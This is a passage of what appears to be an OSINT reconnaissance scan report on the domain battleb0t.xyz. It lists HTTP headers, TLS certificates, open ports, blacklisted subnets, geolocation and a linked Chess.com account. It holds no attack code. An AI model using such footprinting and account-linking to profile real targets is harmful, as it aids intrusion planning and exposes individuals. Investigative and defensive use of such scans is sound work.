["695e2aec93a90cc9e1a6417b158a1f1d94a5129d"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.111.153 |
| 2023-05-12 03:17:57 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [34.148.96.0/20]
http://cinsscore.com/list/ci-badguys.txt | 34.148.96.0/20 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=*.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0031.github.io | 185.199.111.153 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.12): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8080 | 172.67.135.9 |
| 2023-05-12 03:27:00 | Web Technology | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | Express | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/ayshoo | ayshoo |
| 2023-05-12 02:45:59 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -87.6298, u'country_code': u'US', u'timezone': {u'abbreviation': u'', u'gmt_offset': u'', u'is_dst': u'', u'name': u'', u'current_time': u''}, u'latitude': 41.8781, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.21.71.14', u'continent': u'North America', u'region_iso_code': u'IL'} | 104.21.71.14 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflaressl.com |
| 2023-05-12 02:54:51 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.160.0/20 | 34.74.170.74 |
| 2023-05-12 02:45:51 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Special Litigation (Net ID: 00:02:2D:2E:93:90) | 34.0544, -118.244 |
| 2023-05-12 02:44:26 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Nov 17 09:07:51.072 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:16:9A:44:87:BF:E8:FB:88:4F:27:C3:23:
D7:41:4A:F8:BC:44:42:20:18:B7:8C:EF:CD:C8:5C:14:
86:9C:04:8F:02:21:00:D8:FC:B1:DA:CE:C1:81:91:75:
82:10:9B:4A:3A:12:1B:FE:70:80:7F:A6:84:E4:C5:04:
58:38:0B:34:F3:1E:73
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 09:07:51.066 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:15:CD:95:9A:3C:F7:20:93:54:3E:08:F7:
6D:D4:73:9D:63:2C:14:38:C7:1C:15:38:7A:3E:1C:B5:
3A:C9:C0:A8:02:21:00:C8:7B:89:3A:AC:D8:F0:69:E9:
DE:74:9E:7E:74:A9:4E:43:C7:89:2C:62:13:65:90:95:
4A:78:C6:0D:71:91:72
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:19:f9:7b:55:14:7a:4c:2b:b8:a8:55:31:bc:66:
14:95:52:8a:fe:84:4c:61:c2:02:53:4a:80:96:e1:54:a7:b8:
65:6c:70:ad:b8:e9:f0:44:9d:f5:1e:5f:f5:49:05:26:02:31:
00:af:38:a6:7e:99:e5:40:3e:28:0a:04:fc:e6:28:1e:0b:3b:
f4:a2:30:3a:2a:98:5c:14:93:92:27:5b:5b:a6:49:e2:da:ff:
a7:8f:34:6f:32:35:7e:32:3c:5a:8b:ec:81
| battleb0t.xyz |
| 2023-05-12 02:53:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:26.989 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:1A:E4:CF:4C:AD:D9:EC:E6:4D:52:65:1B:
53:65:93:D9:DC:39:99:A6:D5:5A:C5:E1:DA:D9:DC:69:
36:3C:98:86:02:21:00:E0:F7:55:18:14:DF:74:E8:00:
3D:35:13:2B:3F:8A:22:AD:87:C6:66:15:7C:5F:B8:54:
95:49:86:D0:08:0C:1B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:27.535 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:10:EE:87:AF:95:13:B6:C6:D8:9A:F6:9C:
22:3D:17:76:A6:CE:D0:EB:19:02:D0:A5:1A:1A:C9:0A:
31:65:BA:ED:02:21:00:BF:DA:3B:7E:F3:78:A8:0B:93:
1F:B2:E6:E1:12:B5:BD:BA:22:84:17:45:4A:B3:61:A0:
29:F4:AF:0F:35:96:20
Signature Algorithm: sha256WithRSAEncryption
b5:83:07:c9:de:56:9d:a9:96:e7:9d:33:0e:6f:ac:fa:87:16:
78:39:67:66:6c:ed:a2:8a:03:1a:72:05:18:f6:0f:96:45:6f:
8b:7f:87:4a:7e:42:aa:5b:99:9b:ac:a1:20:ef:8a:3a:25:64:
1c:a0:d1:77:e9:b8:80:07:f6:06:a3:d2:6d:a5:d1:dd:94:0d:
f9:e5:86:a9:a6:b8:76:39:cd:1d:fb:3e:ff:83:72:04:4c:2a:
14:fb:7f:65:eb:20:3e:c2:84:49:b5:05:7e:d8:32:30:2d:ef:
38:80:5a:18:e3:cd:59:d6:9f:ac:ee:c8:4b:1a:74:fc:f4:50:
49:af:e3:8f:99:a7:48:63:80:91:24:9e:c4:3b:1d:5f:e7:b4:
1a:3b:17:c3:a0:96:88:b3:17:31:2b:42:d2:5c:02:ce:26:2d:
05:3d:b5:62:e2:53:7c:d1:bc:6c:3b:50:e7:fe:06:7f:f3:8c:
c1:45:7a:6f:01:d6:e5:6b:4c:b1:72:55:a1:cc:c8:79:92:38:
80:4e:bb:ab:bb:48:59:61:91:04:3d:4f:6a:29:7c:c3:ea:6b:
3b:30:22:90:a8:7e:7e:06:d7:9e:99:8b:4b:c9:e9:df:59:76:
1a:71:60:d4:87:0d:e1:27:92:03:31:f8:a9:32:a1:14:b5:ce:
97:e4:9e:4f
| battleb0t.xyz |
| 2023-05-12 02:54:20 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04BK0BS0X0MXB72Y8AY7JTF
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.66): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.222): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c599e10cab22234-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |